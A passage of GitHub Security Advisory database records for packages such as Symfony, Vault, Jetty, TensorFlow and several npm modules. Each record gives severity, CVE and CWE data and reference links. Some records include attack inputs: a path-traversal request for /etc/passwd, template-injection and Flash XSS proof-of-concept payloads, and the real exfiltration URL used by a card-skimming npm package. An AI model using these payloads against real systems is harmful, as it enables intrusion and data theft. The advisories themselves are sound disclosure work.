'https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f@%3Cusers.tomcat.apache.org%3E', 'https://security.gentoo.org/glsa/202003-43', 'https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca@%3Cbugs.httpd.apache.org%3E', 'https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E', 'https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E', 'https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e@%3Cdev.tomee.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG/', 'https://security.netapp.com/advisory/ntap-20200226-0002/', 'https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2@%3Cusers.tomcat.apache.org%3E', 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html', 'https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a@%3Cdev.tomee.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c@%3Cusers.tomcat.apache.org%3E', 'https://github.com/advisories/GHSA-c9hw-wf7x-jp9j', 'https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda@%3Ccommits.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9@%3Cusers.tomcat.apache.org%3E'} | null |
GHSA | GHSA-qw36-p97w-vcqr | Cookie persistence after password changes in symfony/security-bundle | Description
-----------
Since the rework of the Remember me cookie in Symfony 5.3, the cookie is not invalidated anymore when the user changes its password.
Attackers can therefore maintain their access to the account even if the password is changed as long as they have had the chance to login once and get a valid remember me cookie.
Resolution
----------
Symfony now makes the password part of the signature by default. In that way, when the password changes then the cookie is not valid anymore.
The patch for this issue is available [here](https://github.com/symfony/symfony/commit/36a808b857cd3240244f4b224452fb1e70dc6dfc) for branch 5.3.
Credits
-------
We would like to thank Thibaut Decherit for reporting the issue and Wouter J for fixing the issue.
| {'CVE-2021-41268'} | 2022-04-19T19:03:15Z | 2021-11-24T20:05:22Z | MODERATE | 6.5 | {'CWE-384'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-41268', 'https://github.com/symfony/symfony/commit/36a808b857cd3240244f4b224452fb1e70dc6dfc', 'https://github.com/symfony/symfony/security/advisories/GHSA-qw36-p97w-vcqr', 'https://github.com/advisories/GHSA-qw36-p97w-vcqr', 'https://github.com/symfony/symfony/releases/tag/v5.3.12', 'https://github.com/symfony/symfony/pull/44243'} | null |
GHSA | GHSA-fp52-qw33-mfmw | Authentication Bypass by Spoofing and Insufficient Verification of Data Authenticity in Hashicorp Vault | HashiCorp Vault and Vault Enterprise versions 0.7.1 and newer, when configured with the AWS IAM auth method, may be vulnerable to authentication bypass. Fixed in 1.2.5, 1.3.8, 1.4.4, and 1.5.1.. | {'CVE-2020-16250'} | 2022-04-29T20:26:42Z | 2021-08-02T17:11:41Z | CRITICAL | 9.8 | {'CWE-290', 'CWE-345'} | {'https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#151', 'https://nvd.nist.gov/vuln/detail/CVE-2020-16250', 'https://github.com/advisories/GHSA-fp52-qw33-mfmw', 'http://packetstormsecurity.com/files/159478/Hashicorp-Vault-AWS-IAM-Integration-Authentication-Bypass.html', 'https://www.hashicorp.com/blog/category/vault/'} | null |
GHSA | GHSA-83pq-466j-fc6j | Prototype Pollution in sahmat | All versions of `sahmat ` are vulnerable to prototype pollution. The package does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available. | null | 2021-10-01T20:11:32Z | 2020-09-04T15:17:50Z | HIGH | 0 | {'CWE-1321'} | {'https://www.npmjs.com/advisories/1336', 'https://github.com/advisories/GHSA-83pq-466j-fc6j'} | null |
GHSA | GHSA-jh5x-hfhg-78jq | Deserialization of Untrusted Data in Archive_Tar | Archive_Tar through 1.4.10 allows an unserialization attack because phar: is blocked but PHAR: is not blocked. See: https://github.com/pear/Archive_Tar/issues/33 | {'CVE-2020-28948'} | 2022-04-01T18:11:12Z | 2021-04-22T16:20:50Z | HIGH | 7.8 | {'CWE-502'} | {'https://lists.debian.org/debian-lts-announce/2020/11/msg00045.html', 'https://www.debian.org/security/2020/dsa-4817', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28948', 'https://github.com/pear/Archive_Tar/issues/33', 'https://security.gentoo.org/glsa/202101-23', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NBYZSHYTIOBK6V7C4N7TP6KIKCRKLVWP/', 'https://www.drupal.org/sa-core-2020-013', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VJQQYDAOWHD6RDITDRPHFW7WY6BS3V5N/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KWM4CTMEGAC4I2CHYNJVSROY4CVXVEUT/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4V35LBRM6HBCXBVCITKQ4UEBTXO2EG7B/', 'https://github.com/advisories/GHSA-jh5x-hfhg-78jq', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42GPGVVFTLJYAKRI75IVB5R45NYQGEUR/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5KSFM672XW3X6BR7TVKRD63SLZGKK437/', 'https://github.com/pear/Archive_Tar/commit/0670a05fdab997036a3fc3ef113b8f5922e574da'} | null |
GHSA | GHSA-5p3x-r448-pc62 | Improper Verification of Cryptographic Signature in PySAML2 | ### Impact
All users of pysaml2 that use the default `CryptoBackendXmlSec1` backend and need to verify signed SAML documents are impacted. `pysaml2 <= 6.4.1` does not ensure that a signed SAML document is correctly signed. The default `CryptoBackendXmlSec1` backend is using the `xmlsec1` binary to verify the signature of signed SAML documents, but by default, `xmlsec1` accepts any type of key found within the given document. `xmlsec1` needs to be configured explicitly to only use only _x509 certificates_ for the verification process of the SAML document signature.
### Patches
Users should upgrade to pysaml2 `v6.5.0`.
### Workarounds
No workaround provided at this point.
### References
This issue has been reported in the past at the xmlsec1 mailing list:
https://www.aleksey.com/pipermail/xmlsec/2013/009717.html
### Credits
- Brian Wolff
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [pysaml2](https://github.com/IdentityPython/pysaml2)
* Email us at [the incident-response address](mailto:incident-response@idpy.org) | {'CVE-2021-21239'} | 2021-03-01T18:55:05Z | 2021-01-21T14:12:18Z | LOW | 6.5 | {'CWE-347'} | {'https://lists.debian.org/debian-lts-announce/2021/02/msg00038.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21239', 'https://pypi.org/project/pysaml2', 'https://github.com/IdentityPython/pysaml2/security/advisories/GHSA-5p3x-r448-pc62', 'https://github.com/advisories/GHSA-5p3x-r448-pc62', 'https://www.aleksey.com/pipermail/xmlsec/2013/009717.html', 'https://github.com/IdentityPython/pysaml2/releases/tag/v6.5.0', 'https://github.com/IdentityPython/pysaml2/commit/46578df0695269a16f1c94171f1429873f90ed99'} | null |
GHSA | GHSA-j8jw-g6fq-mp7h | SQL injection in hibernate-core | "A flaw was found in hibernate-core in versions prior to and including 5.4.23.Final. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity." | {'CVE-2020-25638'} | 2022-04-22T17:21:52Z | 2022-02-09T22:57:29Z | HIGH | 7.4 | {'CWE-89'} | {'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://github.com/advisories/GHSA-j8jw-g6fq-mp7h', 'https://lists.debian.org/debian-lts-announce/2021/01/msg00000.html', 'https://lists.apache.org/thread.html/r833c1276e41334fa675848a08daf0c61f39009f9f9a400d9f7006d44@%3Cdev.turbine.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25638', 'https://bugzilla.redhat.com/show_bug.cgi?id=1881353', 'https://www.debian.org/security/2021/dsa-4908', 'https://lists.apache.org/thread.html/rf2378209c676a28b71f9b604a3b3517c448540b85367160e558ef9df@%3Ccommits.turbine.apache.org%3E', 'https://www.oracle.com//security-alerts/cpujul2021.html'} | null |
GHSA | GHSA-pjwm-rvh2-c87w | Embedded malware in ua-parser-js | The npm package `ua-parser-js` had three versions published with malicious code. Users of affected versions (0.7.29, 0.8.0, 1.0.0) should upgrade as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/faisalman/ua-parser-js/issues/536) for details as they unfold.
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | null | 2021-10-22T21:43:36Z | 2021-10-22T20:38:14Z | CRITICAL | 0 | {'CWE-506'} | {'https://www.npmjs.com/package/ua-parser-js', 'https://github.com/advisories/GHSA-pjwm-rvh2-c87w', 'https://github.com/faisalman/ua-parser-js/issues/536', 'https://github.com/faisalman/ua-parser-js/issues/536#issuecomment-949772496'} | null |
GHSA | GHSA-xm7f-x4wx-wmgv | Out-of-bounds Read in byte | Versions of `byte` before 1.4.1 allocate uninitialized buffers and read data from them past the initialized length
## Recommendation
Update to version 1.4.1 or later. | null | 2021-08-04T20:47:21Z | 2019-06-04T15:47:43Z | MODERATE | 0 | {'CWE-125'} | {'https://www.npmjs.com/advisories/657', 'https://github.com/node-modules/byte/pull/3', 'https://github.com/advisories/GHSA-xm7f-x4wx-wmgv', 'https://hackerone.com/reports/330351'} | null |
GHSA | GHSA-957j-59c2-j692 | Prototype pollution vulnerability in 'getobject' | Prototype pollution vulnerability in 'getobject' version 0.1.0 allows an attacker to cause a denial of service and may lead to remote code execution. | {'CVE-2020-28282'} | 2021-10-12T16:26:37Z | 2021-10-12T16:26:37Z | CRITICAL | 9.8 | null | {'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28282', 'https://github.com/advisories/GHSA-957j-59c2-j692', 'https://github.com/cowboy/node-getobject/blob/aba04a8e1d6180eb39eff09990c3a43886ba8937/lib/getobject.js#L48', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28282'} | null |
GHSA | GHSA-8wcc-f2vq-h4gx | Cross-site Scripting in livehelperchat | Stored XSS is found in Settings>Live help configuration>Personal Theme>static content. Under the NAME field put a payload {{constructor.constructor('alert(1)')()}} while creating content, and you will see that the input gets stored, and every time the user visits, the payload gets executed. | {'CVE-2022-0370'} | 2022-02-03T20:34:04Z | 2022-01-28T23:06:22Z | MODERATE | 5.4 | {'CWE-79'} | {'https://nvd.nist.gov/vuln/detail/CVE-2022-0370', 'https://github.com/livehelperchat/livehelperchat/commit/9f5bc33c943349bd765b991db0b7f6b6ef05cfdb', 'https://huntr.dev/bounties/fbe4b376-57ce-42cd-a9a9-049c4099b3ca', 'https://github.com/advisories/GHSA-8wcc-f2vq-h4gx'} | null |
GHSA | GHSA-w47j-hqpf-qw9w | Out of bounds read in lazy-init | An issue was discovered in the lazy-init crate through 2021-01-17 for Rust. Lazy lacks a Send bound, leading to a data race. | {'CVE-2021-25901'} | 2021-08-25T20:52:59Z | 2021-08-25T20:52:59Z | MODERATE | 5.3 | {'CWE-125'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-25901', 'https://github.com/advisories/GHSA-w47j-hqpf-qw9w', 'https://rustsec.org/advisories/RUSTSEC-2021-0004.html', 'https://github.com/khuey/lazy-init/issues/9'} | null |
GHSA | GHSA-9fg5-f5pj-rwcc | Hijacked Environment Variables in gruntcli | The `gruntcli` package is a piece of malware that steals environment variables and sends them to attacker controlled locations.
All versions have been unpublished from the npm registry.
## Recommendation
As this package is malware, if you find it installed in your environment, the real security concern is determining how it got there.
If you have found this installed in your environment, you should:
1. Delete the package
2. Clear your npm cache
3. Ensure it is not present in any other package.json files on your system
4. Regenerate your registry credentials, tokens, and any other sensitive credentials that may have been present in your environment variables.
Additionally, any service which may have been exposed via credentials in your environment variables, such as a database, should be reviewed for indicators of compromise as well. | {'CVE-2017-16058'} | 2021-01-08T19:04:59Z | 2018-11-09T17:43:52Z | MODERATE | 0 | {'CWE-506'} | {'https://nvd.nist.gov/vuln/detail/CVE-2017-16058', 'https://nodesecurity.io/advisories/498', 'https://github.com/advisories/GHSA-9fg5-f5pj-rwcc', 'https://www.npmjs.com/advisories/498'} | null |
GHSA | GHSA-x3rh-m7vp-35f2 | Operation on a Resource after Expiration or Release in Jetty Server | In Eclipse Jetty, versions 9.4.27.v20200227 to 9.4.29.v20200521, in case of too large response headers, Jetty throws an exception to produce an HTTP 431 error. When this happens, the ByteBuffer containing the HTTP response headers is released back to the ByteBufferPool twice. Because of this double release, two threads can acquire the same ByteBuffer from the pool and while thread1 is about to use the ByteBuffer to write response1 data, thread2 fills the ByteBuffer with response2 data. Thread1 then proceeds to write the buffer that now contains response2 data. This results in client1, which issued request1 and expects responses, to see response2 which could contain sensitive data belonging to client2 (HTTP session ids, authentication credentials, etc.). | {'CVE-2019-17638'} | 2021-06-15T18:11:20Z | 2020-08-05T14:52:59Z | CRITICAL | 9.4 | {'CWE-675', 'CWE-672'} | {'https://github.com/eclipse/jetty.project/issues/4936', 'https://lists.apache.org/thread.html/r7fc5f2ed49641ea91c433e3cd0fc3d31c0278c87b82b15c33b881415@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/ra8661fc8c69c647cb06153c1485d48484a833d873f75dfe45937e9de@%3Ccommits.pulsar.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://lists.apache.org/thread.html/r81f58591fb4716fb867b36956f30c7c8ad4ab3f23abc952d9d86a2a0@%3Ccommits.pulsar.apache.org%3E', 'https://snyk.io/vuln/SNYK-JAVA-ORGECLIPSEJETTY-575561', 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r521168299e023fb075b57afe33d17ff1d09e8a10e0fd8c775ea0e028@%3Ccommits.pulsar.apache.org%3E', 'https://github.com/eclipse/jetty.project/commit/ff8ae56fa939c3477a0cdd1ff56ce3d902f08fba', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XE6US6VPZHOWFMUSFGDS5V2DNQPY5MKB/', 'https://github.com/advisories/GHSA-x3rh-m7vp-35f2', 'https://lists.apache.org/thread.html/rd98cfd012490cb02caa1a11aaa0cc38bff2d43bcce9b20c2f01063dd@%3Ccommits.pulsar.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-17638', 'https://lists.apache.org/thread.html/rbe1f230e87ea947593145d0072d0097ddb0af10fee1161db8ca1546c@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r29073905dc9139d0d7a146595694bf57bb9e35e5ec6aa73eb9c8443a@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r9584c4304c888f651d214341a939bd264ed30c9e3d0d30fe85097ecf@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r378e4cdec15e132575aa1dcb6296ffeff2a896745a8991522e266ad4@%3Ccommits.pulsar.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2020/08/17/1', 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=564984', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.apache.org/thread.html/r4bdd3f7bb6820a79f9416b6667d718a06d269018619a75ce4b759318@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r9a2cfa56d30782a0c17a5deb951a622d1f5c8de48e1c3b578ffc2a84@%3Ccommits.pulsar.apache.org%3E'} | null |
GHSA | GHSA-57v4-m9jx-mh8r | Improper Input Validation | A vulnerability was found in OVN Kubernetes in versions up to and including 0.3.0 where the Egress Firewall does not reliably apply firewall rules when there is multiple DNS rules. It could lead to potentially lose of confidentiality, integrity or availability of a service. | {'CVE-2021-3499'} | 2022-03-15T21:36:54Z | 2021-06-08T23:05:19Z | MODERATE | 5.6 | {'CWE-863'} | {'https://github.com/ovn-org/ovn-kubernetes/pull/2169', 'https://bugzilla.redhat.com/show_bug.cgi?id=1949188', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3499', 'https://github.com/advisories/GHSA-57v4-m9jx-mh8r'} | null |
GHSA | GHSA-pg59-2f92-5cph | Heap buffer overflow in Tensorflow | ### Impact
The `SparseCountSparseOutput` and `RaggedCountSparseOutput` implementations don't validate that the `weights` tensor has the same shape as the data. The check exists for `DenseCountSparseOutput`, where both tensors are fully specified:
https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L110-L117
In the sparse and ragged count weights are still accessed in parallel with the data:
https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L199-L201
But, since there is no validation, a user passing fewer weights than the values for the tensors can generate a read from outside the bounds of the heap buffer allocated for the weights.
### Patches
We have patched the issue in 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and will release a patch release.
We recommend users to upgrade to TensorFlow 2.3.1.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability is a variant of [GHSA-p5f8-gfw5-33w4](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p5f8-gfw5-33w4) | {'CVE-2020-15196'} | 2021-11-19T15:20:13Z | 2020-09-25T18:28:21Z | HIGH | 8.5 | {'CWE-119', 'CWE-122', 'CWE-125'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-15196', 'https://github.com/advisories/GHSA-pg59-2f92-5cph', 'https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-pg59-2f92-5cph', 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'} | null |
GHSA | GHSA-5p9j-w2wx-qx4c | Open Redirect in django-spirit | django-spirit prior to version 0.12.3 is vulnerable to open redirect. In the /user/login endpoint, it doesn't check the value of the next parameter when the user is logged in and passes it directly to redirect which result to open redirect. This also affects /user/logout, /user/register, /user/login, /user/resend-activation. | {'CVE-2022-0869'} | 2022-03-14T21:19:29Z | 2022-03-07T00:00:40Z | MODERATE | 6.1 | {'CWE-601'} | {'https://github.com/nitely/spirit/commit/8f32f89654d6c30d56e0dd167059d32146fb32ef', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0869', 'https://github.com/advisories/GHSA-5p9j-w2wx-qx4c', 'https://huntr.dev/bounties/ed335a88-f68c-4e4d-ac85-f29a51b03342'} | null |
GHSA | GHSA-v99v-xgjx-7m7g | Malicious Package in asnyc | All versions of `asnyc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
## Recommendation
Remove the package from your dependencies and always ensure package names are typed correctly upon installation. | null | 2021-10-01T14:00:56Z | 2020-09-02T18:40:47Z | CRITICAL | 9.8 | {'CWE-506'} | {'https://github.com/advisories/GHSA-v99v-xgjx-7m7g', 'https://www.npmjs.com/advisories/847'} | null |
GHSA | GHSA-72cx-5ff9-4hhc | Cross-site scripting in markdown2 for python | python-markdown2 before 1.0.1.14 has multiple cross-site scripting (XSS) issues. | {'CVE-2009-3724'} | 2022-04-26T20:29:03Z | 2022-04-21T01:54:03Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/advisories/GHSA-72cx-5ff9-4hhc', 'https://www.openwall.com/lists/oss-security/2009/10/29/5', 'https://nvd.nist.gov/vuln/detail/CVE-2009-3724'} | null |
GHSA | GHSA-6h7w-fc84-x7p6 | StaticFile.fromUrl can leak presence of a directory | ### Impact
`StaticFile.fromUrl` can leak the presence of a directory on a server when the `URL` scheme is not `file://`, and the URL points to a fetchable resource under its scheme and authority. The function returns `F[None]`, indicating no resource, if `url.getFile` is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL would return a stream, and the path in the URL exists as a directory on the server, the presence of the directory on the server could be inferred from the 404 response. The contents and other metadata about the directory are not exposed.
This affects http4s versions:
* 0.21.7 through 0.21.23
* 0.22.0-M1 through 0.22.0-M8
* 0.23.0-M1
* 1.0.0-M1 through 1.0.0-M22
### Patches
The [patch](https://github.com/http4s/http4s/commit/52e1890665410b4385e37b96bc49c5e3c708e4e9) is available in the following versions:
* v0.21.24
* v0.22.0-RC1
* v0.23.0-RC1
* v1.0.0-M23
Note: a previous version of this advisory incorrectly referred to 0.22.0-M9 and 0.23.0-M2.
### Workarounds
Don't call `StaticFile.fromUrl` with non-file URLs.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [the http4s repository](https://github.com/http4s/http4s)
* Disclose further vulnerabilities according to the [http4s security policy](https://github.com/http4s/http4s/blob/main/SECURITY.md)
| {'CVE-2021-32643'} | 2021-05-28T15:54:39Z | 2021-05-28T15:54:39Z | MODERATE | 5.8 | {'CWE-22'} | {'https://mvnrepository.com/artifact/org.http4s/http4s-core', 'https://github.com/http4s/http4s/commit/52e1890665410b4385e37b96bc49c5e3c708e4e9', 'https://github.com/advisories/GHSA-6h7w-fc84-x7p6', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32643', 'https://github.com/http4s/http4s/security/advisories/GHSA-6h7w-fc84-x7p6'} | null |
GHSA | GHSA-8xj3-7258-w4q2 | Directory Traversal in dasafio | Affected versions of `dasafio` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead. | {'CVE-2017-16179'} | 2021-01-14T15:38:57Z | 2020-09-01T18:51:22Z | MODERATE | 0 | {'CWE-22'} | {'https://github.com/advisories/GHSA-8xj3-7258-w4q2', 'https://nodesecurity.io/advisories/460', 'https://www.npmjs.com/advisories/460', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/dasafio', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16179'} | null |
GHSA | GHSA-h96w-mmrf-2h6v | Improper Input Validation in Twisted | In Twisted Web through 20.3.0, there was an HTTP request splitting vulnerability. When presented with two content-length headers, it ignored the first header. When the second content-length value was set to zero, the request body was interpreted as a pipelined request. | {'CVE-2020-10108'} | 2022-04-04T21:10:30Z | 2020-03-31T15:42:42Z | CRITICAL | 9.8 | {'CWE-20', 'CWE-444'} | {'https://usn.ubuntu.com/4308-1/', 'https://usn.ubuntu.com/4308-2/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-10108', 'https://security.gentoo.org/glsa/202007-24', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL/', 'https://know.bishopfox.com/advisories/twisted-version-19.10.0', 'https://github.com/advisories/GHSA-h96w-mmrf-2h6v', 'https://github.com/twisted/twisted/blob/6ff2c40e42416c83203422ff70dfc49d2681c8e2/NEWS.rst#twisted-2030-2020-03-13', 'https://lists.debian.org/debian-lts-announce/2022/02/msg00021.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D/'} | null |
GHSA | GHSA-p9gf-gmfv-398m | Double free in slice_deque | An issue was discovered in the slice-deque crate through 2021-02-19 for Rust. A double drop can occur in SliceDeque::drain_filter upon a panic in a predicate function. | {'CVE-2021-29938'} | 2021-08-25T20:54:16Z | 2021-08-25T20:54:16Z | HIGH | 7.5 | {'CWE-415'} | {'https://github.com/advisories/GHSA-p9gf-gmfv-398m', 'https://github.com/gnzlbg/slice_deque/issues/90', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29938', 'https://rustsec.org/advisories/RUSTSEC-2021-0047.html'} | null |
GHSA | GHSA-8c8c-4vfj-rrpc | Reflected Cross-Site Scripting in redis-commander | Affected versions of `redis-commander` contain a cross-site scripting vulnerability in the `highlighterId` paramter of the clipboard.swf component on hosts serving Redis Commander.
Mitigating factors:
Flash must be installed / enabled for this to work. The below proof of concept was verified to work using Firefox 57.0 on Windows 10 by manually installing the [Flash NPAPI Windows plugin](https://get.adobe.com/flashplayer/otherversions/)
## Proof of concept
```
http://instance/jstree/_docs/syntax/clipboard.swf?highlighterId=\%22))}%20catch(e)%20{alert(document.domain);}//
```
## Recommendation
No direct patch for this vulnerability is currently available.
At this time, the best mitigation is to use an alternative, functionally equivalent package, or to use extreme caution when using redis-commander, ensuring that redis-commmander is the only web page you have open, and avoiding clicking on any links. | null | 2022-04-19T19:03:26Z | 2020-09-01T19:05:11Z | LOW | 0 | {'CWE-79'} | {'https://hackerone.com/reports/296377', 'https://github.com/advisories/GHSA-8c8c-4vfj-rrpc', 'https://github.com/joeferner/redis-commander/commit/1a483ebb3a706cf199dd283cf0aead96606adb14', 'https://www.npmjs.com/advisories/562', 'https://github.com/joeferner/redis-commander/releases/tag/v0.5.0'} | null |
GHSA | GHSA-w6j8-jc36-x5q9 | Improper Neutralization of Text-Values in Object Version Preview | Text-values were not properly escaped before printed in the version preview. This allowed XSS by authenticated users with access to the resources. | {'CVE-2021-39166'} | 2021-09-02T18:54:55Z | 2021-09-01T18:22:09Z | HIGH | 8 | {'CWE-79'} | {'https://github.com/pimcore/pimcore/security/advisories/GHSA-w6j8-jc36-x5q9', 'https://github.com/pimcore/pimcore/pull/10170', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39166', 'https://github.com/advisories/GHSA-w6j8-jc36-x5q9'} | null |
GHSA | GHSA-4943-9vgg-gr5r | Cross-site Scripting in quill | A vulnerability in the HTML editor of Slab Quill allows an attacker to execute arbitrary JavaScript by storing an XSS payload (a crafted `onloadstart` attribute of an IMG element) in a text field. No patch exists and no further releases are planned.
This CVE is disputed. Researchers have claimed that this issue is not within the product itself, but is intended behavior in a web browser. More information can be found [here](https://github.com/quilljs/quill/issues/3364). | {'CVE-2021-3163'} | 2022-03-22T15:00:37Z | 2021-05-10T15:38:12Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/advisories/GHSA-4943-9vgg-gr5r', 'https://burninatorsec.blogspot.com/2021/04/cve-2021-3163-xss-slab-quill-js.html', 'https://github.com/quilljs/quill/issues/3364', 'https://quilljs.com', 'https://github.com/quilljs/quill/issues/3273', 'https://github.com/quilljs/quill/issues/3359', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3163'} | null |
GHSA | GHSA-j5qg-46p9-w2rp | Malicious Package in jekyll-for-github-projects | Version 0.2.12 of `jekyll-for-github-projects` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
## Recommendation
Remove the package from your environment and evaluate your application to determine whether or not user data was compromised. | null | 2020-09-03T00:33:32Z | 2020-09-03T00:33:32Z | CRITICAL | 0 | null | {'https://www.npmjs.com/advisories/936', 'https://github.com/advisories/GHSA-j5qg-46p9-w2rp'} | null |
GHSA | GHSA-c697-r227-pq6h | Unrestricted Upload of File with Dangerous Type in pimcore | Unrestricted Upload of File with Dangerous Type in Packagist pimcore/pimcore | {'CVE-2022-0263'} | 2022-01-25T20:47:42Z | 2022-01-21T23:33:58Z | HIGH | 7.8 | {'CWE-434'} | {'https://github.com/pimcore/pimcore/commit/35d1853baf64d6a1d90fd8803e52439da53a3911', 'https://github.com/advisories/GHSA-c697-r227-pq6h', 'https://huntr.dev/bounties/96506857-06bc-4c84-88b7-4f397715bcf6', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0263'} | null |
GHSA | GHSA-4fx9-vc88-q2xc | Infinite loop in Pillow | JpegImagePlugin may append an EOF marker to the end of a truncated file, so that the last segment of the data will still be processed by the decoder.
